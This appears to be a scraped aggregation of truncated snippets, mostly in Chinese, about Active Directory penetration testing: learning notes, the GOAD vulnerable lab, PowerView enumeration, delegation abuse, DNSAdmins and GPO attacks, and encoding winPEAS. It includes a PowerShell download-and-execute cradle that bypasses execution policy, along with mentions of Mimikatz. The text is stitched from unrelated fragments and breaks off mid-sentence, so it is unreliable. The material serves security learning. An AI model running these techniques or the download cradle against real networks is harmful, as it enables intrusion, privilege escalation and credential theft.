Active-Directory-Pentest-Notes 声明 仅记录学习笔记,类似学生时代的笔记本,不是为了别人而写~ 不喜勿喷,不喜勿视~ 如有错误,请及时提醒,以免误导他人 域环境下载 链接: 提取码:z7m8 感谢@klion师傅分享的域...
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to practice usual attack techniques. Warning This lab is extremely vulnerable, do not reuse recipe to build your environment and do not deploy thi...
powershell.exe -exec Bypass -C “IEX (New-Object Net.WebClient).DownloadString(‘’);Get-NetDomain” 先生成一个ps payload,假设我们取得一个目标的权限。 基础命令 一些基本的信息收集命令,下面的命令请用域用户登陆... Mimikatz 在域中只有服务账户才能有委派功能,所以先把用户sqladmin设置为服务账号。 setspn -U -A variant/golden sqladmin 查看配置成功与否 setspn -l sqladmin 然后在“AD...
政府 CNCERTCNNVD 会员体系(甲方)会员体系(厂商)产品名录企业空间 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 被以下专辑收录,发现更多精彩内容 + 收入我的专辑 + 加入我的收藏 安全渗透与测试 干货|从无到有学习Python编写poc原创 ...
这个脚本是对来自@snovvcrash 网站的脚本和 PowerSharpPack 的一些代码的修改。 使用如下命令打包 ..\EncodeAssembly.ps1Invoke-EncodeAssembly-binaryPathwinPEAS.exe-namespacewinPEAS-capture$true ...
这里搭建实验来进行验证,其中我们通过一个普通域用户(labuser)进行初始访问AD域(DNS和AD是同一台服务器)。 让我们首先使用PowerView枚举属于DNSAdmins组的用户信息 PS C:\>Get-NetGroupMember -GroupName "DNSAdmins" 在真正的红队或pentest中,下一步是攻击的是buildadmin用户。我们可以使用PowerView的Invoke-User...
During the pentest of an Active Directory environment, we recently came across a situation in which we were able to relay the authentication data of a user having write permissions on asensitiveGroup Policy Object (GPO). Due to the peculiarities of GPOs’ implementation in Active Directory, e...
GOAD is a pentest active directory LAB project. The purpose of this lab is to give pentesters a vulnerable Active directory environment ready to use to practice usual attack techniques. WarningThis lab is extremely vulnerable, do not reuse recipe to build your environment and do not deploy this...
Audit and pentest methodologies for Active Directory including internal enumeration, privesc, lateral movement, etc. - Kiosec/AD-Exploitation